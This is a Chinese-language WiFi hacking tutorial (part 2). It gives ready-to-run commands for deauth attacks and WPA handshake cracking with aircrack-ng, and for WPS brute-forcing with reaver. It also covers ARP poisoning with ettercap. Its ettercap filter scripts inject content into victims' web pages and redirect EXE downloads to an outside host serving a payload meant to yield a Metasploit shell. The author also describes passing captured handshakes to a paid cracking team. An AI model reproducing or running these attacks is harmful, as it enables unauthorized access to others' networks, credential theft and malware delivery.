从入门到精通:WiFi渗透哪家强?(2)

-C参数是选择目标信道。如果该信道就目标一个AP使用的话不用加上–bssid,这个参数是为了跟精准的锁定目标。

-w 是保存握手包的名字，获取后会在当前目录生成一个mobi-01.cap的握手包。这时就不用关闭这条shell而是另外打开一个shell。

Aireplay-ng-0 10 -a (AP的mac)-c (客户端的mac)

-0参数是发起deauth攻击.10 是次数可以调节

-a 即第一条shell中BSSID.下面的AP路由器MAC地址

-c 即STATION下客户机的MAC地址(这条为可选项)

Aircrack-ng-w /pentest/passwords/sxsx.lst mobi-01.cap

-w 选择字典

mobi-01.cap 即抓到的握手包

Ps：我是不建议自己跑密码的。我直接挂载u盘吧握手包copy到u盘里在通过QQ方式吧包发给跑包团队。

然后是吧正确密码添加到了我的字典里。才会出现上图(既成功破解后的图)!

另外是密码使用有一定联系性规律性密码。

破解方案二:利用路由器wps功能漏洞

Airodump-ngmon0 查看附近无线情况。使用wash -i mon0 -C可查看是否开启了wps功能。

Reaver -i mon0 -b xx:xx:xx:xx-vv

reaver命令参数

-i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key(可以提高PJ速度)-vv 显示更多的非严重警告-d 即delay每穷举一次的闲置时间 预设为1秒-t 即timeout每次穷举等待反馈的最长时间-c 指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9 参数防止路由僵死

示例：

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv

应因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1

目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1

目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

0×03 渗透案例：内网渗透!漫游深圳信息安全测评中心实例

http://wooyun.org/bugs/wooyun-2014-080628

在发文章前已经通过“乌云漏洞平台”提交给厂商，有兴趣的小伙伴可以关注下

Arp大杀器

Ettercap有四种界面，Text，Curses，GTK2 ，Daemonize。

Text界面相当于我们常说的命令行界面，只显示字符。其启动参数为-T。通常与其配套的参数有-q。(安静模式)若加上了该选项，则不会显示抓到数据包的内容。

Curses和GTK2是图形化界面，可以用鼠标点的，在此略过。

Daemonize是守护模式，相当于在后台运行。

arp毒化有双向(remote)和单向(oneway)两种方式。

双向方式将对两个目标的ARP缓存都进行毒化，对两者之间的通信进行监听。单向方式只会监听从第一个目标到第二个目标的单向通信内容。一般来说，我们会选择使用双向欺骗的方式来获取所有的数据包进行嗅探分析。例如：-M arp:remote /10.0.0.2/ // 表示对10.0.0.2的所有端口的通信进行嗅探，包括发出的数据包和收到的数据包。若目标主机开启了ARP防火墙怎么办?直接欺骗会引发报警且无效果。这时就是单向ARP毒化大显神威的时候了。只要路由器没有对IP和MAC进行绑定，我们就可以只欺骗路由器，使从路由器发给目标主机的数据包经过中间人，完成我们的攻击。

首先先介绍下Ettercap。例如DNS服务欺骗，替换网页中内容(网页元素&下载文件&插入脚本)并可配合ssltrip突破ssl加密截获密码。

一个强大的Ettercap肯定是要配合一个强大的过滤脚本。下面介绍一下Ettercap过滤脚本。

下面是对一个网页内容进行的替换，使用方法举一个例子吧。可将网页上的图片、视频、音乐替换成自己指定的。某君表白就用了这个，恶作剧也是非常管用的。一个大晚上的夜晚正看着电视机突然被切换成各种灵异的视频，发出了各种惊悚的音乐下面是找的一些过滤规则。可根据下面修改!

if (ip.proto== TCP && tcp.dst == 80) {if (search(DATA.data, "Accept-Encoding")){replace("Accept-Encoding", "Accept-Rubbish!");# note: replacement string is same length as originalstring#msg("zapped Accept-Encoding!\n");}}if (ip.proto== TCP && tcp.src == 80) {replace("img src=", "imgsrc=http://bbs.isilic.org/static/image/common/logo.png' ");replace("IMG SRC=", "imgsrc=http://bbs.isilic.org/static/image/common/logo.png' ");msg("过滤执行.\n");}

这个替换下载EXE文件的规则配合msf可直接拿shell。

if (ip.proto== TCP && tcp.dst == 80) {if (search(DATA.data, "Accept-Encoding")){replace("Accept-Encoding", "Accept-Mousecat");msg("zapped Accept-Encoding!\n");}}if (ip.proto== TCP && tcp.src == 80) {replace("keep-alive", "close" ");replace("Keep-Alive", "close" ");}if (ip.proto== TCP && search(DATA.data, ":application") ){msg("found EXE\n");if (search(DATA.data, "Win32")){msg("doing nothing\n");} else {replace("200 OK", "301 Moved Permanently Location:http://bbs.isilic.org/setup.exe");msg("redirect success\n");}}